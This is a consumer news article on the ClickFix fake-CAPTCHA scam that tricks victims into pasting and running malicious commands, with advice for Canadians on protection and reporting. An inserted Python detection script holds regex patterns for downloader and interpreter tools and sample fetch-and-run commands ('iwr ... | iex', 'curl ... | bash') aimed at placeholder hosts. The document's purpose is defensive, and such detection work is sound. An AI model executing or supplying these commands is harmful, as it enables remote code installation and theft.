Ticking the “I’m not a robot” box is one of the most reflexive actions on the internet — a small ritual that signals you are a human. And that familiarity is exactly what cybercriminals are now taking advantage of. As Microsoft reports, a rapidly spreading scam known as ClickFix is exploiting people and their comfort with that routine to trick them into installing malware on their own devices, handing over passwords, banking credentials and access to crypto wallets — all without ever clicking a suspicious link.
And the threat is real: According to Infosecurity Magazine, ClickFix attacks surged 517% from 2024 to 2025, making it one of the fastest-growing forms of cybercrime in the world. In Canada, it can result in substantial losses: The Canadian Anti-Fraud Centre’s (CAFC) Annual Statistics Report shows it received 112,000 fraud reports in 2025, with identity theft topping the list at 8,403 reported incidents; reported losses totalled $704 million.
Crucially, the Competition Bureau Canada estimates that only 5% to 10% of fraud incidents are ever reported, meaning the real cost is almost certainly far higher.
Tricking targets into installing malware themselves
What makes ClickFix so dangerous — and so effective — is that the target is tricked into doing all the work themselves. And since victims unknowingly type in the commands to install the malware themselves, antivirus systems may not recognize it as an intrusion. Once the malware is installed, cybercriminals have broad access to the device and can sell your personal information to others.
Here’s how the attack plays out on both Windows and Mac devices.
Step 1: The fake verification page
You land on a website and encounter what looks like a standard CAPTCHA prompt — “Verify you are human” or similar. What comes next reveals the scam.
A message appears claiming the CAPTCHA system has failed and that you need to follow a few quick steps to resolve the problem. You may see a button labelled “Fix It” or “How to Fix” — this is where the scam’s alternate name, ClickFix, comes from. Clicking it copies malicious code onto your clipboard. At this stage, nothing is installed yet.
Step 2: You install the malware yourself
Here is the key moment: The scammer’s page then prompts you through a set of keystrokes that paste and run that code on your own system — and once you do, the malware is live.
On a Windows computer, the sequence typically looks like this:
- Win + R (opens the Windows Run dialog)
- Ctrl + V (pastes the malicious code)
- Enter (executes the malware)
On a Mac, victims are directed to:
- Command + Space (opens Spotlight)
- Type “Terminal” and press Enter (opens the command-line interface)
- Command + V (pastes the malicious code)
- Return (executes the malware)
Since the victim initiates each step, conventional antivirus programs may not flag anything as suspicious. Microsoft Defender experts documented thousands of devices compromised by ClickFix attacks every month, even on machines that have enterprise-grade endpoint detection and response solutions installed.
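For anyone triaging a device after the keystrokes above: Windows keeps recent Run dialog entries in the RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), and commands run in the Mac Terminal end up in the shell history file. The sketch below is an added example, not part of the original article; it scores such entries with a few heuristic indicators, and the indicator list, function names and sample entries are assumptions constructed for illustration.

```python
import re

# Heuristic indicators: assumptions of this example, not a vetted rule set.
INDICATORS = {
    "script_host": re.compile(
        r"\b(powershell|pwsh|mshta|wscript|cscript|cmd(\.exe)?\s+/c|osascript|bash|zsh|sh)\b", re.I),
    "downloader": re.compile(r"\b(curl|wget|iwr|invoke-webrequest|bitsadmin|certutil)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "hidden_or_encoded": re.compile(
        r"-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|base64\s+(-d|--decode)", re.I),
    "pipe_to_interpreter": re.compile(r"\|\s*(iex|invoke-expression|sh|bash|zsh)\b", re.I),
}
ZSH_PREFIX = re.compile(r"^: \d+:\d+;")  # zsh extended-history timestamp prefix

def normalize(entry):
    """Strip the zsh timestamp prefix and the trailing '\\1' RunMRU stores."""
    entry = ZSH_PREFIX.sub("", entry.strip())
    return entry[:-2] if entry.endswith("\\1") else entry

def indicators(command):
    """Return the sorted names of the indicators present in one command."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(command))

def triage(entries, threshold=2):
    """Flag entries that start a script host and show at least one more trait."""
    flagged = []
    for entry in entries:
        command = normalize(entry)
        hits = indicators(command)
        if "script_host" in hits and len(hits) >= threshold:
            flagged.append((command, hits))
    return flagged

# Constructed sample entries (not real incident data); hosts are placeholders.
SAMPLES = [
    r"notepad\1",
    r'powershell -w hidden -c "iwr https://example.invalid/v | iex"\1',
    r"\\fileserver\share\1",
    ": 1735689600:0;curl -s https://example.invalid/i.sh | bash",
    ": 1735689700:0;ls -la ~/Downloads",
]

if __name__ == "__main__":
    for command, hits in triage(SAMPLES):
        print(f"SUSPICIOUS {hits}: {command}")
```

Ordinary entries such as a program name or a file share path are not flagged, because a script host alone or a path alone does not meet the threshold.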
How to protect yourself
The first and most important rule: Real CAPTCHAs will never ask you to open a command window or type in keystrokes to fix a problem. If any verification step asks you to hit a button or run commands on your computer, stop immediately and navigate away from the site.
Canada’s Get Cyber Safe national awareness campaign — run by the Communications Security Establishment (CSE) — recommends enabling multi-factor authentication (MFA) on every account you have that allows it. According to Get Cyber Safe, MFA is capable of blocking over 99.9% of account compromise attacks: Even if a cybercriminal obtains your password, they still can’t access your account without a second form of verification.
What to do if you think you’ve been caught
If you followed any of the steps on a suspicious page that prompted you to install malware, act immediately:
- Disconnect from the internet. Turn off your Wi-Fi or unplug your ethernet cable to limit the malware’s ability to transmit your data.
- Use a different, clean device to change your passwords on any important accounts including banking, email, investment platforms and social media.
- Scan your compromised device for malware while it remains offline, using a trusted antivirus program if you have one installed.
- If you don’t have antivirus software, take the device to a professional for a full security scan before reconnecting it to the internet.
- Monitor your bank and credit card accounts closely for any transactions you don’t recognize.
- Place a fraud alert on your credit report by contacting Equifax Canada or TransUnion Canada directly.
- Report the incident to the RCMP’s Report Cybercrime and Fraud portal at reportcyberandfraud.canada.ca, or contact the CAFC at 1-888-495-8501. Even if you weren’t victimized, reporting attempted scams helps law enforcement track and disrupt criminal networks.
Next steps for Canadians: building better digital habits
The ClickFix scam works because it exploits trust and routine. The best long-term defence is a combination of awareness and practical security habits. Here are the steps experts recommend:
- Enable MFA on every account that offers it. Only 53% of Canadians currently use MFA — a gap that leaves millions of accounts vulnerable.
- Keep your devices and operating systems up to date. Software updates frequently patch the security vulnerabilities that malware exploits.
- Use a reputable antivirus program and keep its definitions current.
- Bookmark the Government of Canada’s Get Cyber Safe website (getcybersafe.gc.ca) for practical, plain-language security guidance updated regularly by CSE.
- Know where to report. Bookmark the Report Cybercrime and Fraud portal (reportcyberandfraud.canada.ca) before you need it. Reporting — even an attempted scam — helps the CAFC and RCMP National Cybercrime Coordination Centre (NC3) build a national picture of threats to warn others.
- Talk to family members who may be more vulnerable. The CAFC’s Financial Literacy Report says Canadians over 60 tend to experience higher average financial losses per incident, and fraud awareness conversations within families are among the most effective prevention tools available.
-With files from Melanie Huddart
Laura Boast is an Associate Editor with Moneywise.com and a lifelong content creator who has reached international audiences at Discovery, CBC, Blue Ant Media, Bond Brand Loyalty and more.
